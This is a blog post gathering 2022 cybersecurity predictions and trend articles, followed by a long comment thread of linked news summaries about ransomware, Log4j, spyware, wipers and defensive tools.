Nothing is more difficult than making predictions. Instead of trowing out wild ideas what might be coming, I have collected here some trends other people have predicted or reported.
Why the Future Needs Passwordless Authentication
https://securityintelligence.com/future-needs-passwordless-authentication/
As of September, Microsoft users no longer have to rely on passwords when logging in to their accounts. Passwords were suitable for authentication when users had fewer accounts, but things have changed.
Nowadays, everyone’s digital footprint is larger, making passwords more of a burden than a security necessity.
Cyber Warfare: What To Expect in 2022
https://securityintelligence.com/articles/cyber-warfare-what-to-expect-2022/
Cyberwarfare is not a future threatit’s a clear and present danger.
While the concept of cyber terrorism might sound like something from a fictional movie, our interconnected world is riddled with security flaws that make it an unfortunate reality. Read on as we cover seven cyber warfare and cybersecurity threats to watch out for in 2022.
Prediction Season: What’s in Store for Cybersecurity in 2022?
https://www.securityweek.com/prediction-season-whats-store-cybersecurity-2022
The past year has been quite challenging and tiring for many IT and security professionals, as threat actors capitalized on the rapidly changing environment created by accelerated digitalization and cloud transformation in response to the COVID-19 pandemic. And while we all hope that the next year is better when it comes to the onslaught of daily phishing, ransomware, and credential stuffing attacks; cyber criminals will likely learn from this year’s successful tactics, retool, and pivot them into next year’s campaigns to wreak even more havoc in all lives.
Consider the following threats that are on the horizon in 2022 and start preparing for them now:
Compromised Identities Continue to Fuel the Cyberattack Engine
Ransomware Attacks Evolve to Multifaceted Extortion Schemes
Pay Attention to the Supply Chain Threats
The Work from Anywhere Era Creates New Threats
“AI and ML will be an enabler for cybersecurity for the foreseeable future”
https://cisomag.eccouncil.org/ai-and-ml-will-be-an-enabler-for-cybersecurity-for-the-foreseeable-future/
We are proceeding in an era of “Malthusian” advances in science and technology, enabled by faster computing and ever-expanding data analytics. Those emerging technologies are significantly impacting cybersecurity. They include artificial intelligence (AI), machine learning, high-performance computing, cloud, edge computing, 5G, and eventually quantum technologies.
Computing systems that employ AI and ML are becoming more pervasive and critical to cyber operations and have become a major focus of cybersecurity research development and investments. Advanced 5G and wireless networks will benefit higher traffic capacities, lower latency, increased reliability, and enable processing and analytics in real-time. Edge computing strives to bring real-time computation, data storage, and operations closer to the device, rather than relying on a central location, avoiding latency issues. Technologies that improve capabilities for discovering, categorizing, monitoring, synthesizing, and automating the analysis of data are advantages in mitigating cybersecurity threats. Specifically, such tech can be used to bolster botnet detection and mitigation technology, data visualization tools, active malware protection, rootkit detection and mitigation technology, and incident response analytics.
Emerging tech can be a two-way street for good and bad. Artificial intelligence and machine learning can be used by hackers to automate target selection and more. Threat actors, especially state-sponsored and criminal enterprises, are becoming more sophisticated by searching for vulnerabilities and infiltrating malware by adapting (and automating), enabling machine learning, deep learning, artificial intelligence, and other analytic tools.
Also, the emergence of the Internet of Things presents special security challenges. There are an estimated 44 billion IoT endpoints today and trillions of sensors connected to those endpoints. Hackers have many attack options and entries for inserting malware into such a large and unregulated attack surface.
Google Finds 35,863 Java Packages Using Defective Log4j
https://www.securityweek.com/google-finds-35863-java-packages-using-defective-log4j
The computer security industry is bracing for travel on long, bumpy roads littered with Log4j security problems as experts warn that software dependency patching hiccups will slow global mitigation efforts.
The sheer scale and impact of the crisis became a bit clearer this week with Google’s open-source team reporting that a whopping 35,863 Java packages in Maven Central are still using defective versions of Log4j library.
The vulnerability, flagged as CVE-2021-44228, was first discovered and reported by the Alibaba cloud security team on November 24 this year. Less than two weeks later, exploitation was spotted in the wild, prompting the release of multiple high-priority patches and an industry-wide scramble to apply practical mitigations.
Many actors have exploited the critical Apache Log4j vulnerability named Log4Shell to infect vulnerable devices. Apache has released several Log4j versions to fix the original Log4j vulnerability (CVE-2021-44228) and newer findings on the same software (CVE-2021-44832, CVE-2021-45046, CVE-2021-45105, CVE-2021-42550).
Threat Intelligence on Log4j CVE: Key Findings and Their Implications
https://www.akamai.com/blog/security/threat-intelligence-on-log4j-cve-key-findings-and-their-implications
Expect this vulnerability to have a long attack tail. We anticipate that due to how widely used this software is and the large number of exploit variations, we will continue to see exploit attempts for months to come and expect many breaches will get uncovered going forward.
Attackers used opportunistic injections and became more targeted. Consequences of the reconnaissance may not be fully understood for months. While the attacks can be mitigated by patching and other methods, it’s unclear how many breaches have happened already. It will take time for the breaches to come to light and for us to understand their magnitude.
Ransomware in 2022: We’re all screwed
https://www.zdnet.com/article/ransomware-in-2022-were-all-screwed/
Over the past few years, we’ve seen ransomware operators evolve from disorganized splinter groups and individuals to highly sophisticated operations, with separate teams collaborating to target everything from SMBs to software supply chains. Ransomware infection is no longer an end goal of a cyberattack. We are experiencing the “golden era of ransomware,” now in part due to multiple monetization options.
Burnout: The next great security threat at work
https://blog.1password.com/state-of-access-report-burnout-breach/
Many companies feel like they’ve successfully pivoted to remote and hybrid work. Team members have learned the tools and processes required to be successful outside the office, and IT departments have adjusted their security rules and policies accordingly. But now, nearly two years into the pandemic, another cybersecurity threat has
emerged: employee burnout.
In 2022, security will be Linux and open-source developers job number one
https://www.zdnet.com/article/in-2022-security-will-be-linux-and-open-source-developers-job-number-one/
Linux is everywhere. It’s what all the clouds, even Microsoft Azure, run. It’s what makes all 500 of the Top 500 supercomputers work. Heck, even desktop Linux is growing if you can believe Pornhub, which claims Linux users grew by 28%, while Windows users declined by 3%. Its real trouble isn’t so much with open-source itself. There’s nothing magical about open-source methodology and security. Security mistakes can still enter the code. Linus’s law is that given enough eyeballs, all bugs are shallow. But, if not enough developers are looking, security vulnerabilities will still go unnoticed. As what I’m now calling Schneier’s law, “Security is a process, not a product, ” points out constant vigilance is needed to secure all software.
The future of OT security in an IT-OT converged world
https://www.theregister.com/2021/11/09/securing_ics_in_the_cloud/
Securing ICS in the cloud requires ‘fundamentally different’ approach
If you thought the industrial internet of things (IIoT) was the cutting edge of industrial control systems, think again. Companies have been busy allowing external access to sensors and controllers in factories and utilities for a while now, but forward-thinking firms are now exploring a new development; operating their industrial control systems (ICS) entirely from the cloud. That raises a critical question: who’s going to protect it all?
Dave Masson, Director of Enterprise Security at Darktrace, calls this new trend ‘ICSaaS’. “ICS for the cloud is starting to happen now. That represents a whole new world for industrial technology and security.”
This trend has been possible for the last decade or so, he explains, but the uptake has been slow. Now, Masson is hearing from clients who are actioning it.
Operational technology admins may be nervous about allowing cloud-based control of their infrastructures, but they’re attracted by the potential benefits. If operators are accessing ICS remotely anyway, then it makes it easier to consider cloud-based interfaces. These make the management infrastructure cheaper and easier to operate.
In this scenario, the hardware components that make up ICS stay where they are. We’re not talking about virtualizing programmable logic controllers here. It’s the data governing their operation that moves to the cloud. That means the applications, databases, and other services that operators rely on to keep those components running smoothly.
Security is just as important in these new cloud-enabled environments as it was in the old legacy walled gardens, but the challenges facing defenders are different. The cloud is eroding the gap between IT and OT. OT is now part of what looks increasingly like a common IT network.
“Now, anybody can access this network from anywhere, so you’ve got to make sure you have good controls around who’s got permission”
“This raises questions about data security, compliance, and regulation.”
OT admins, used to maintaining an iron grip on their infrastructure, now risk a loss of visibility and control. There are organizational worries to consider beyond the technological ones. Converging IT/OT infrastructures is only part of the story. You must also decide who is managing security for the expanded network. Is it the IT security team, or the OT team, or both?
Zero trust architecture is a common talking point today when discussing cloud-based security, and that will be important. ICSaaS is only one part of a broader shift towards OT/IT convergence. The advent of 5G, along with the development of edge computing, will accelerate the trend still further.
Sophos 2022 Threat Report: Malware, Mobile, Machine learning and more!
https://nakedsecurity.sophos.com/2021/11/09/2022-threat-report/
we’ve covered five main topics: 1 Malware, 2 Mobile, 3 Machine Learning and AI, 4 Ransomware (because we simply couldn’t not give it a section of its own), and 5 Where next?. PDF:
https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2022-threat-report.pdf
“AI and ML will be an enabler for cybersecurity for the foreseeable future”
https://cisomag.eccouncil.org/ai-and-ml-will-be-an-enabler-for-cybersecurity-for-the-foreseeable-future/
What are some of the emerging technologies in security? Would these generate opportunities and create challenges?
Critical Infrastructure (CI) and supply chain will be targeted even more in 2022 (state-sponsored, cybercriminal gangs) with ransomware and malware attacks.
• Investment and risk strategies will expand in conducting vulnerability assessments and filling operational gaps with cybersecurity tools. Tools include Data Loss Prevention (DLP), encryption, identity and access management solutions, log management, and SIEM platforms.
• Despite efforts to attract workers to security and tech jobs, the qualified cybersecurity worker shortage will continue to pose major operational challenges. Both the public and private sectors are currently facing challenges from a dearth of cybersecurity talent. A report out from the firm Cybersecurity Ventures estimates there are 3.5 million unfilled cybersecurity jobs in 2021. 2022 is not showing any signs of improvement in hiring.
• The Internet of Things (IoT) will pose a growing cybersecurity risk. IoT’s exponential connectivity is an ever-expanding mesh of networks and devices.
There are some specific areas where AI technology will contribute to making cybersecurity smarter include:
• AI can provide a faster means to detect and identify cyberthreats. Cybersecurity companies will be using software and a platform powered by AI that monitors real-time activities on the network by scanning data and files to recognize unauthorized communication attempts, unauthorized connections, abnormal/malicious credential use, brute force login attempts, unusual data movement, and data exfiltration. This allows businesses to draw statistical inferences and protect against anomalies before they are reported and patched.
• AI will impact Incident Diagnosis and Response capabilities.
While descriptive analytics provided by network surveillance and threat detection tools can answer the question “what happened,” incident diagnosis analytics address the question of “why and how it happened.” To answer those questions, new software applications and platforms powered by AI can examine past data sets to find root causes of the incident by looking back at change and anomaly indicators in the network activities
• AI will also enable better cyberthreat intelligence reports by analysts. Next year analysts will be able to use AI tools to generate automated cyberthreat intelligence reports (CTI). Cyberthreat intelligence reports provide the indicators and early warning necessary to better monitor unusual activities on a given network and detect more rapidly cyber threats.
AI and ML will be an enabler for cybersecurity for the foreseeable future. AI-powered tools and automation enablement will play an increased and integral role in keeping us cyber-safe in 2022 and beyond.
Kännyköiden tietoturva menee uusiksi
https://etn.fi/index.php/13-news/12788-kaennykoeiden-tietoturva-menee-uusiksi
In smartphones, security has been in place for more than a decade, with trusted processing performed in the TEE (Trusted Execution Environment) section of device memory. The current standard solution for smartphone security is typically created with Arm’s TrustZone technology. The phone’s own security comes from TEE. A secure boot usually includes a TEE. TEE has been an elegant solution for smartphones, although it is becoming old-fashioned (Arm TrustZone was developed 15 years ago).
The memory required by the TEE has not been available in the small controller chips used for embedded applications. Manufacturers have promoted Safe Boot and Memory Encryption or Flash Encryption, but they have been pretty weak solutions. Recently, Arm’s TrustZone M has introduced a new security model for controllers.
In recent years, this picture has begun to diversify. A revolution is underway now. Google has launched a keystone technology that allows an application to generate a system-maintained key and authenticate services (still uses TEE).
In the future, for example, encryption keys will be stored in an isolated memory area, an enclave, says Jan-Erik Ekberg, head of Huawei’s HSSL laboratory (Helsinki System Security Lab). Five years ago, Intel introduced SGX technology for PC servers, which simply means security extension commands added to the CPU chip. In this solution, TEE type protections are provided by a secure enclave. The use of this type of security enclave needs less code than traditional TEE structure. An enclave is a temporary structure in the memory of a device. It is created only for security processes and exits when it has completed its task. The difference is significant in the TEE structure, where another kernel runs all the time alongside the operating system. When there is no other parallel kernel, there is one component less to attack.
In Intel’s SGX, enclaves were implemented through caching, which limited their use. Intel has sought to overcome this limitation with newer TDX (Trust Domain Extensions) technology. AMD aims to do the same with its own SEV (Secure Encrypted Virtualization) technology.
Enclave-style solution structure will also come in the smart phones. The new Armv9-A architecture last year offers a realm mode that is very close to the technologies offered on the server side (Intel SGX). With the coming enclaves, an infinite number of secured environments will be available in principle.
In the mobile ecosystem, TEE is so deeply rooted that the transition will probably take five years. During the transition period TEE and more dynamic solutions will be on the market in parallel.
Kyberhyökkäykset uhkaavat jo tavarantoimituksiakin
https://www.uusiteknologia.fi/2021/11/08/kyberhyokkaykset-uhkaavat-jo-tavarantoimituksiakin/
Cyber attacks will cause chaos in product supply chains in the future, estimates Japanese security firm Trend Micro in its latest report. They can also cause physical harm to people, so it’s not just about problems with production or distribution.
According to Trend Micro, network connectivity by 2030 will affect our everyday lives even more, both physically and mentally. At the same time, cyber threats are constantly evolving and abusing technological innovation in ever new ways.
Artificial intelligence tools democratize cybercrime from technically savvy individuals and criminal organizations to all. The new “Everything as a Service” service model also makes cloud service providers very attractive targets for cyber attackers.
Massive IoT (MIoT) environments in industrial facilities, logistics centers, transportation systems, healthcare, education, commerce, and homes are attractive targets for saboteurs and blackmailers. The new 5G and subsequent 6G networks are also making attacks more sophisticated and targeted.
In the future, user manipulation and fake news will become increasingly important and difficult to ignore when fed to smart glasses. Reality can be badly distorted.
https://resources.trendmicro.com/rs/945-CXD-062/images/WP01_Project%202030_White%20Paper_210505US_Web.pdf
Jarno Limnéll varoittaa “kyberpandemiasta” internetin häiriö voi panna maailman taas sekaisin
https://www.tivi.fi/uutiset/tv/211df5c9-7909-47b7-842b-719f6a496206
Cyber harassment and sports doping have a lot in common. Tracing and testing methods are evolving, but so are scams. And scammers always seem to be one step ahead. Sometimes they are only revealed years later. “The world is moving in the direction that technology is evolving faster and faster, and rather increasing the possibility of various disruptions and creating new types of vulnerabilities. There is no seamless security,” Limnagl says. So even with technology, the world will not be completed. In addition, crises always come as a surprise: New York on September 11, the Bosnian war, Hitler’s rise to power, the shots in Sarajevo. “In light of history, we’re always surprised. And if you think about it, technology only adds to the complexity and surprise of crises.”
Kyberhyökkäykset kiihtyvät, mutta yritykset voivat vastata niihin
https://etn.fi/index.php/new-products/13-news/12920-kyberhyoekkaeykset-kiihtyvaet-mutta-yritykset-voivat-vastata-niihin
Cyber attacks are accelerating, but companies can respond to them A new study by security firm Trend Micro predicts that the number of cyber attacks will increase, with a particular focus on IoT devices. At the same time in 2022 global organizations will be more vigilant and better prepared to face new cyber threats. Research, foresight, and automation are critical to risk management and employee protection. The shift of workers to telecommuting has opened up new avenues for attackers, so the attack area of companies and organizations has grown exponentially. Fortunately, hybrid work is becoming more established and more predictable, allowing security decision-makers to plan and refine their security strategies. Those are:
• Enhanced server security and application management policies to combat blackmail
• A risk-based update plan and an effort to detect security vulnerabilities in advance
• Improved basic protection for SMEs using cloud services
• Active network monitoring, especially in IoT environments
• Zero Trust security model to secure international supply chains
• Cloud security focused on the risks assessed by the DevOps team and industry best practices
• Advanced Detection and Response (XDR) model to detect attacks on large networks
Trend Micron raportti: tulevaisuudessa kaikki on vaarassa
https://etn.fi/index.php/13-news/12785-trend-micro-raportti-tulevaisuudessa-kaikki-on-vaarassa
Security company Trend Micro has released its 2030 future report. Videos also tell us what the world could look like at the beginning of the next decade. From the perspective of cyber threats and cybersecurity, the future looks bleak. By 2030, connectivity, or continuous online presence, will affect our daily lives on both a physical and mental level. At the same time, cyber threats are constantly evolving and abusing technological innovation in ever new ways.
Trend Micro hopes that this review will spark debate both within the security industry and in society at large. We can only prepare for the cyber challenges of the next decade by comprehensively anticipating all possible situations and advising how governments, the business world and individuals can prepare for them.
Project 2030
https://2030.trendmicro.com/?utm_campaign=ADC2021_Corporate_2030_Predictions&utm_medium=Press-Release&utm_source=Press-Release_Glimpse-into-future_PR&utm_content=Watch-video
Welcome to your new reality, more connected than ever to all the riches modern life has to offer, yet where truth has never been more insubstantial.
3,062 Comments
Tomi Engdahl says:
The Elite Hackers of the FSB
For almost two decades, hackers with Snake have been forcing their way into government networks. They are considered one of the most dangerous hacker groups in the world. Who they work for, though, has always been a matter of pure speculation. But reporters with the German public broadcasters and have discovered some clues, and they all lead to the Russian secret service FSB.
https://interaktiv.br.de/elite-hacker-fsb/en/index.html
Tomi Engdahl says:
https://scitechdaily.com/r2c-an-open-source-tool-for-software-security/
Tomi Engdahl says:
https://capt-meelo.github.io//redteam/maldev/2021/12/15/lazy-maldev.html
Tomi Engdahl says:
https://www.iflscience.com/technology/man-accidentally-cuts-off-town-internet-while-trying-to-block-kid-from-social-media/
Tomi Engdahl says:
How to secure your home and office network: The best DNS blockers and firewalls
Solid antivirus protection isn’t enough anymore. Here’s a brief guide to shoring up your SOHO and SMB cybersecurity defenses.
https://www.zdnet.com/article/how-to-secure-your-home-and-office-network-the-best-dns-blockers-and-firewalls/
Tomi Engdahl says:
NIST proposes model to assess cybersecurity investment strategies in network security
The larger the network, the larger the attack surface. Computational models may pinpoint the best places for investment.
https://www.zdnet.com/article/nist-proposes-model-to-assess-cybersecurity-investment-strategies-in-network-security/
Tomi Engdahl says:
GitHub calls for contributions to new cybersecurity Advisory Database
GitHub has already published the full contents of the Advisory Database to encourage collaboration.
https://www.zdnet.com/article/github-calls-for-contributions-to-new-cybersecurity-advisory-database/
Tomi Engdahl says:
Backups ‘no longer effective’ for stopping ransomware attacks
Traditional methods of mitigating ransomware are less efficacious thanks to the rise in double and triple extortion techniques
https://www.computerweekly.com/news/252513735/Backups-no-longer-effective-for-stopping-ransomware-attacks
The growth of double extortion – and even triple extortion – ransomware attacks is in danger of rendering common, traditional methods of mitigating the impact of a ransomware hit, such as well-maintained backups, less efficacious, according to a report from machine identity specialist Venafi.
Tomi Engdahl says:
HPKE: Standardizing public-key encryption (finally!)
https://blog.cloudflare.com/hybrid-public-key-encryption/
For the last three years, the Crypto Forum Research Group of the Internet Research Task Force (IRTF) has been working on specifying the next generation of (hybrid) public-key encryption (PKE) for Internet protocols and applications. The result is Hybrid Public Key Encryption (HPKE), published today as RFC 9180.
HPKE was made to be simple, reusable, and future-proof by building upon knowledge from prior PKE schemes and software implementations. It is already in use in a large assortment of emerging Internet standards, including TLS Encrypted Client Hello and Oblivious DNS-over-HTTPS, and has a large assortment of interoperable implementations, including one in CIRCL. This article provides an overview of this new standard, going back to discuss its motivation, design goals, and development process
Tomi Engdahl says:
How a Saudi woman’s iPhone revealed hacking around the world https://finance.yahoo.com/news/saudi-womans-iphone-revealed-hacking-100851583.html
An unusual error in NSO’s spyware allowed Saudi women’s rights activist Loujain al-Hathloul and privacy researchers to discover a trove of evidence suggesting the Israeli spyware maker had helped hack her iPhone, according to six people involved in the incident. A mysterious fake image file within her phone, mistakenly left behind by the spyware, tipped off security researchers.
Tomi Engdahl says:
Aviation Attacks Tied To Single APT – TA2541
https://www.bankinfosecurity.com/aviation-attacks-tied-to-single-apt-ta2541-a-18536
Cyberattacks in the aviation sector over the past several years have been tied to a single advanced persistent threat group named TA2541, which – since at least 2017 – has used more than a dozen remote access Trojans to control compromised machines, according to a report from cybersecurity firm Proofpoint.
Tomi Engdahl says:
Thanks, dad: Jammer used to stop kids going online, wipes out a town’s internet by mistake
https://www.zdnet.com/article/thanks-dad-jammer-used-to-control-kids-online-time-father-wipes-out-a-towns-internet-by-mistake/#ftag=RSSbaffb68
The father claimed that his teenagers had become “addicted” to social media and browsing the web since the start of the COVID-19 pandemic, a situation potentially made worse due to social restrictions and lockdowns.. The jammer was intended to stop them from covertly using their smartphones to go online when they were meant to be asleep.
However, the jammer also managed to wreck connectivity havoc for other residents and the neighboring town.
Tomi Engdahl says:
CISA Compiles Free Cybersecurity Services and Tools for Network Defenders https://www.cisa.gov/uscert/ncas/current-activity/2022/02/18/cisa-compiles-free-cybersecurity-services-and-tools-network
CISA has compiled and published a list of free cybersecurity services and tools to help organizations reduce cybersecurity risk and strengthen resiliency. This non-exhaustive living repository includes services provided by CISA, widely used open source tools, and free tools and services offered by private and public sector organizations across the cybersecurity community.
Tomi Engdahl says:
GitHub code scanning now finds more security vulnerabilities https://www.bleepingcomputer.com/news/security/github-code-scanning-now-finds-more-security-vulnerabilities/
Code hosting platform GitHub today launched new machine learning-based code scanning analysis features that will automatically discover more common security vulnerabilities before they end up in production.
Tomi Engdahl says:
Here comes the web browser 100 problem | ZDNet
https://www.zdnet.com/article/here-comes-the-web-browser-100-problem/
Google Chrome and Firefox will both soon release their 100th version — and that could mean trouble for both website developers and web browser users.
Soon both Google Chrome, the most popular of all web browsers, and the Firefox web browser will release their 100th version. Now, besides just being a cool number, there are technical issues that come with these anniversary releases. Some of those issues may cause your websites to fail.
Yes, fail. Here’s why.
All web browsers come with a User-Agent (UA). This is a string that browsers send in HTTP headers, so servers can identify the browser. JavaScript also uses it with the JavaScript navigator.userAgent. Web developers use the UA in all kinds of ways with their server-side programs.
You can check today if your site has such a problem using a Chrome feature flag, which forces Chrome to send a three-digit UA. Then, you can check to see if the new UA is being presented properly by visiting the test site, Is Chrome 100 Yet? Then you can use this browser to check out your own sites for problems. Firefox is also offering similar tests.
https://is-chrome-100-yet.glitch.me/
https://www.otsukare.info/2021/04/20/ua-three-digits-get-ready
Tomi Engdahl says:
NFTs: New Fraud Targets
https://www.forbes.com/sites/davidbirch/2022/02/20/nfts-new-fraud-targets/
The automation of fraud demands better defences, beginning with digital identity.
Also possible OpenSea smart contract hacking https://web3isgoinggreat.com/?id=2022-02-19-0
Tomi Engdahl says:
Mobile malware evolution 2021
https://securelist.com/mobile-malware-evolution-2021/105876/
In 2021, we observed a downward trend in the number of attacks on mobile users. But it is too early to celebrate: attacks are becoming more sophisticated in terms of both malware functionality and vectors.
Tomi Engdahl says:
Qbot and Zerologon Lead To Full Domain Compromise https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/
Soon after execution of the Qbot payload, the malware established C2 connectivity and created persistence on the beachhead. Successful exploitation of the Zerologon vulnerability (CVE-2020-1472) allowed the threat actors to obtain domain admin privileges.. This level of access was abused to deploy additional Cobalt Strike beacons and consequently pivot to other sensitive hosts within the network. The threat actor then exfiltrated sensitive documents from the environment before being evicted from the network.
Tomi Engdahl says:
US to attack cyber criminals first, ask questions later if it protects victims https://www.theregister.com/2022/02/21/doj_cyber_offensive_policy/
The United States Department of Justice (DoJ) has revealed new policies that may see it undertake pre-emptive action against cyber threats. Such actions will be undertaken if the DoJ feels that action can reduce risks for victims. Monaco mentioned “providing decryptor keys or seizing servers used to further cyberattacks” as possible interventions.
Tomi Engdahl says:
ENISA and CERT-EU publish set of cybersecurity best practices for public and private organizations https://www.helpnetsecurity.com/2022/02/21/eu-cybersecurity-best-practices/
The European Union Agency for Cybersecurity (ENISA) and CERT-EU published a joint set of cybersecurity best practices for public and private organizations in the EU.
Tomi Engdahl says:
Mobile device monitoring services do not authenticate API requests
https://kb.cert.org/vuls/id/229438
The backend infrastructure shared by multiple mobile device monitoring services does not adequately authenticate or authorize API requests, creating an IDOR (Insecure Direct Object Reference) vulnerability.
These services and their associated apps can be used to perform non-consensual, unauthorized monitoring and are commonly called “stalkerware.” An unauthenticated remote attacker can access .
personal information collected from any device with one of the stalkerware variants installed. [Also https://techcrunch.com/2022/02/22/stalkerware-network-spilling-data/
On the front line of the operation is a collection of white-label Android spyware apps that continuously collect the contents of a person’s phone, each with custom branding, and fronted by identical websites with U.S. corporate personas that offer cover by obfuscating links to its true operator.. Behind the apps is a server infrastructure controlled by the operator, which is known to TechCrunch as a Vietnam-based company called 1Byte.]
Tomi Engdahl says:
Ransomware victims are paying up. But then the gangs are coming back for more https://www.zdnet.com/article/ransomware-victims-are-paying-up-but-the-crooks-are-coming-back-for-more/
Many organisations that fall prey to ransomware attacks end up paying a ransom multiple times as cyber criminals exploit weaknesses in cybersecurity to squeeze their victims for as much cash as they can.
Report at
https://www.proofpoint.com/sites/default/files/threat-reports/pfpt-us-tr-state-of-the-phish-2022.pdf
Tomi Engdahl says:
83% of employees continue accessing old employer’s accounts https://www.helpnetsecurity.com/2022/02/21/employees-maintaining-accounts-access/
In a recent study, Beyond Identity gathered responses from former employees across the United States, the United Kingdom, and Ireland and found 83% of employees admitted to maintaining continued access to accounts from a previous employer.
Tomi Engdahl says:
Chinese Experts Uncover Details of Equation Group’s Bvp47 Covert Hacking Tool https://thehackernews.com/2022/02/chinese-experts-uncover-details-of.html
Researchers from China’s Pangu Lab have disclosed details of a “top-tier” backdoor put to use by the Equation Group, an advanced persistent threat (APT) with alleged ties to the cyber-warfare intelligence-gathering unit of the U.S. National Security Agency (NSA).
Dubbed “Bvp47″ owing to numerous references to the string “Bvp” and the numerical value “0×47″ used in the encryption algorithm, the backdoor was extracted from Linux systems “during an in-depth forensic investigation of a host in a key domestic department” in 2013.
The defense research group codenamed the attacks involving the deployment of Bvp47 “Operation Telescreen,” with the implant featuring an “advanced covert channel behavior based on TCP SYN packets, code obfuscation, system hiding, and self-destruction design.”
Bvp47 is said to have been used on more than 287 targets in the academia, economic development, military, science, and telecom sectors located in 45 countries, mainly in China, Korea, Japan, Germany, Spain, India, and Mexico, all the while going largely undetected for over a decade.
The Bvp47 – a Top-tier Backdoor of US NSA Equation Group
https://www.pangulab.cn/en/post/the_bvp47_a_top-tier_backdoor_of_us_nsa_equation_group/
In a certain month of 2013, during an in-depth forensic investigation of a host in a key domestic department, researchers from the Pangu Lab extracted a set of advanced backdoors on the Linux platform, which used advanced covert channel behavior based on TCP SYN packets, code obfuscation, system hiding, and self-destruction design. In case of failure to fully decrypt, It is further found that this backdoor needs the check code bound to the host to run normally. Then the researchers cracked the check code and successfully ran the backdoor. Judging from some behavioral functions, this is a top-tier APT backdoor, but further investigation requires the attacker’s asymmetric encrypted private key to activate the remote control function. Based on the most common string “Bvp” in the sample and the numerical value 0×47 used in the encryption algorithm, the team named the corresponding malicious code “Bvp47″ at the time.
In 2016 and 2017, “The Shadow Brokers” published two batches of hacking files claimed to be used by “The Equation Group”. In these hacking files, researchers form Pangu Lab found the private key that can be used to remotely trigger the backdoor Bvp47. Therefor, It can be concluded that Bvp47 is a hacker tool belonging to “The Equation Group”.
Through further research, the researchers found that the multiple procedures and attack operation manuals disclosed by “The Shadow Broker” are completely consistent with the only identifier used in the NSA network attack platform operation manual [References 3 and 4] exposed by CIA analyst Snowden in the “Prism” incident in 2013.
Tomi Engdahl says:
Log4j Remediation Took Weeks or More for Over 50% of Organizations https://www.darkreading.com/attacks-breaches/log4j-remediation-took-weeks-or-more-for-more-than-50-of-organizations
(ISC)² survey also found that half of cybersecurity teams worldwide worked on fixing Log4j issues on weekends and during time off.
Tomi Engdahl says:
The Rise and Fall of log4shell
https://isc.sans.edu/diary/rss/28372
Over time, attackers and researchers lost interest in log4j. We did see the peak of activity in the latter part of December, with December 28th sticking out.
Tomi Engdahl says:
Inside the Lab Where Intel Tries to Hack Its Own Chips https://www.wired.com/story/intel-lab-istare-hack-chips/
That’s why five years ago Intel launched a dedicated hardware hacking group known as Intel Security Threat Analysis and Reverse Engineering [...]. iSTARE researchers crack open computer cases, physically solder new circuits on a motherboard, deliver strategic electromagnetic pulses to alter behavior as electrons flow through a processor, and measure whether physical traits like heat emissions or vibrations incidentally leak information about what a device is doing.
Tomi Engdahl says:
Recent Cyberattacks Target Open-source Web Servers https://www.trendmicro.com/en_us/research/22/b/recent-cyberattacks-open-source-web-servers.html
Malicious actors take advantage of people’s reliance on web servers to perform attacks like remote code execution, access control bypass, denial of service, or even cyberjacking the victim servers to mine cryptocurrencies.
Tomi Engdahl says:
Access Brokers: Who Are the Targets, and What Are They Worth?
https://www.crowdstrike.com/blog/access-brokers-targets-and-worth/
Access brokers have advertised organizations from more than 30 different sectors, demonstrating an eclectic range of targets. Among these, the academic, government and technology sectors were the most frequently advertised, accounting for a combined 49% of the total advertisements.. [...] access to the academic sector was, on average, priced at $3, 827 USD. In comparison, the government sector which was the second most advertised attracted an average asking price of $6,
151 USD. Geographically, advertisements for access to U.S.-based entities far surpass those for all other countries, claiming 55% of the total. Organizations based in Brazil and the UK secure second and third spots with 8% and 7%, respectively.
Tomi Engdahl says:
Shadowserver Starts Conducting Daily Scans to Help Secure ICS https://www.securityweek.com/shadowserver-starts-conducting-daily-scans-help-secure-ics
The Shadowserver Foundation this week announced that it has started conducting daily internet scans in an effort to identify exposed industrial control systems (ICS) and help organizations reduce their exposure to attacks.
Tomi Engdahl says:
Dragos 2021 Industrial Cybersecurity Year In Review Summary https://www.dragos.com/blog/dragos-2021-industrial-cybersecurity-year-in-review-summary/
Ransomware became the number one attack vector in the industrial sector. Dragos assessed that manufacturing accounted for 65% of all ransomware attacks. Two ransomware groups, Conti and Lockbit 2.0, caused 51 percent of attackswith 70% of their malicious activity targeting manufacturing. [Report at https://hub.dragos.com/hubfs/333%20Year%20in%20Review/2021/2021%20ICS%20OT%20Cybersecurity%20Year%20In%20Review%20-%20Dragos%202021.pdf?hsLang=en
Tomi Engdahl says:
New laws to strengthen UK cybersecurity provisions https://www.pandasecurity.com/en/mediacenter/security/new-laws-uk-cybersecurity/
Under the new laws, the government is proposing to extend these obligations to providers of outsourced IT services too. This means that any company providing IT services including cloud software and storage will need to prove their cyber defence capabilities adhere to the NIS regulations.
Tomi Engdahl says:
Microsoft Security delivers new multicloud capabilities https://www.microsoft.com/security/blog/2022/02/23/microsoft-security-delivers-new-multicloud-capabilities/
Today, we’re taking another step in Microsoft’s journey to protect our customers across diverse cloud systems by extending the native capabilities of Microsoft Defender for Cloud to the Google Cloud Platform (GCP).
Tomi Engdahl says:
Meet The Secretive Surveillance Wizards Helping The FBI And ICE Wiretap Facebook And Google Users https://www.forbes.com/sites/thomasbrewster/2022/02/23/meet-the-secretive-surveillance-wizards-helping-the-fbi-and-ice-wiretap-facebook-and-google-users/
Sometimes it takes a spy to get transparency from a surveillance company. Jack Poulson, founder of technology watchdog Tech Inquiry, went incognito at the National Sheriffs’ Association’s winter conference in Washington. He recorded a longtime PenLink employee showing off what the company could do for law enforcement and discussing the scale of its operations. Not only does the recording lift the lid on how deeply involved PenLink is in wiretapping operations across the U.S., it also reveals in granular detail just how tech providers such as Apple, Facebook and Google provide information to police when they’re confronted with a valid warrant or subpoena.
Tomi Engdahl says:
HermeticWiper | New Destructive Malware Used In Cyber Attacks on Ukraine https://www.sentinelone.com/labs/hermetic-wiper-ukraine-under-attack/
On February 23rd, the threat intelligence community began observing a new wiper malware sample circulating in Ukrainian organizations. Our analysis shows a signed driver is being used to deploy a wiper that targets Windows devices, manipulating the MBR resulting in subsequent boot failure. This blog includes the technical details of the wiper, dubbed HermeticWiper, and includes IOCs to allow organizations to stay protected from this attack. This sample is actively being used against Ukrainian organizations, and this blog will be updated as more information becomes available. Also:
https://www.welivesecurity.com/2022/02/24/hermeticwiper-new-data-wiping-malware-hits-ukraine/.
